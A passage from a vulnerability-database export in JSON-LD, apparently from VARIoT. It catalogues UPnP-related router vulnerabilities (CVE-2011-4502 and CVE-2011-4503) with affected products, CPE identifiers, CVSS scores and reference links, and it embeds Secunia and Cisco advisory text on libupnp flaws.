"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"id": "VAR-201111-0159",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
}
],
"trust": 1.361728088888889
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
}
]
},
"last_update_date": "2023-12-18T12:09:29.415000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.broadcom.com/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sitecom.com/"
},
{
"title": "Patch for Sitecom WL-111 configuration vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6004"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.9,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.6,
"url": "http://www.upnp-hacks.org/suspect.html"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4503"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4503"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/18224"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/52035/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/325/"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20130129-upnp"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/922681"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-10-05T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2013-01-29T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"date": "2011-11-24T00:00:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"date": "2013-01-31T07:26:31",
"db": "PACKETSTORM",
"id": "119949"
},
{
"date": "2013-01-30T02:46:44",
"db": "PACKETSTORM",
"id": "119896"
},
{
"date": "2011-11-22T11:55:05.967000",
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-11-30T00:00:00",
"db": "CERT/CC",
"id": "VU#357851"
},
{
"date": "2014-07-30T00:00:00",
"db": "CERT/CC",
"id": "VU#922681"
},
{
"date": "2011-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-5043"
},
{
"date": "2015-03-19T08:33:00",
"db": "BID",
"id": "50810"
},
{
"date": "2011-10-12T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"date": "2011-11-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-003033"
},
{
"date": "2013-01-24T05:00:00",
"db": "NVD",
"id": "CVE-2011-4503"
},
{
"date": "2011-11-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "UPnP requests accepted over router WAN interfaces",
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "configuration error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-365"
}
],
"trust": 0.6
}
}
VAR-201111-0158
Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation in Edimax EdiLinux on the Edimax BR-6104K with firmware before 3.25, Edimax 6114Wg, Canyon-Tech CN-WF512 with firmware 1.83, Canyon-Tech CN-WF514 with firmware 2.08, Sitecom WL-153 with firmware before 1.39, and Sweex LB000021 with firmware 3.15 allows remote attackers to execute arbitrary commands via shell metacharacters. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. UPnP For supported routers, WAN Unintended from the side interface UPnP There is a vulnerability that allows the request to be accepted.An unauthenticated remote third party could obtain local network information or use the product as a proxy. There are vulnerabilities in the Edimax Edimax EdiLinux UPnP IGD installation enablement. An attacker can exploit this issue to gain unauthorized access to scan the internal host or proxy internet traffic through an affected device. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0158",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lb000021 router",
"scope": "eq",
"trust": 3.0,
"vendor": "sweex",
"version": "3.15"
},
{
"model": "br-6104k",
"scope": null,
"trust": 1.4,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153",
"scope": null,
"trust": 1.4,
"vendor": "sitecom",
"version": null
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "3.21"
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "wl-153 router",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": "1.34"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 1.0,
"vendor": "sitecom",
"version": null
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": null
},
{
"model": "6114wg",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": null
},
{
"model": "lb000021",
"scope": "eq",
"trust": 1.0,
"vendor": "sweex",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 1.0,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "6114wg router",
"scope": "eq",
"trust": 1.0,
"vendor": "edimax",
"version": "1.83"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.8,
"vendor": "canyon",
"version": null
},
{
"model": "cn-wf514 router",
"scope": "eq",
"trust": 0.8,
"vendor": "canyon",
"version": "2.08"
},
{
"model": "br-6104k router",
"scope": "lt",
"trust": 0.8,
"vendor": "edimax",
"version": "3.25"
},
{
"model": "br-6114wg",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "br-6114wg router",
"scope": null,
"trust": 0.8,
"vendor": "edimax",
"version": null
},
{
"model": "wl-153 router",
"scope": "lt",
"trust": 0.8,
"vendor": "sitecom",
"version": "1.39"
},
{
"model": "lb000021",
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": "br-6104k router",
"scope": "eq",
"trust": 0.6,
"vendor": "edimax",
"version": "3.21/2.08/1.83"
},
{
"model": "6114wg",
"scope": null,
"trust": 0.6,
"vendor": "edimax",
"version": null
},
{
"model": "cn-wf512 router",
"scope": "eq",
"trust": 0.6,
"vendor": "canyon tech",
"version": "2.08/1.83"
},
{
"model": "cn-wf514",
"scope": null,
"trust": 0.6,
"vendor": "canyon tech",
"version": null
},
{
"model": "cn-wf512",
"scope": null,
"trust": 0.6,
"vendor": "canyon tech",
"version": null
},
{
"model": "wl-153 router /1.34 router",
"scope": "eq",
"trust": 0.6,
"vendor": "sitecom",
"version": "1.31"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.3,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.3,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.3,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.3,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5045"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003032"
},
{
"db": "NVD",
"id": "CVE-2011-4502"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-364"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:br-6104k_router_firmware:3.21:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:br-6104k:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf512_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canyon-tech:cn-wf514_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf514:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canyon-tech:cn-wf512:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:1.83:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:edimax:6114wg_router_firmware:2.08:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:edimax:6114wg:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:sitecom:wl-153_router_firmware:1.34:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sitecom:wl-153:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:sweex:lb000021_router_firmware:3.15:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:sweex:lb000021:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4502"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4502",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
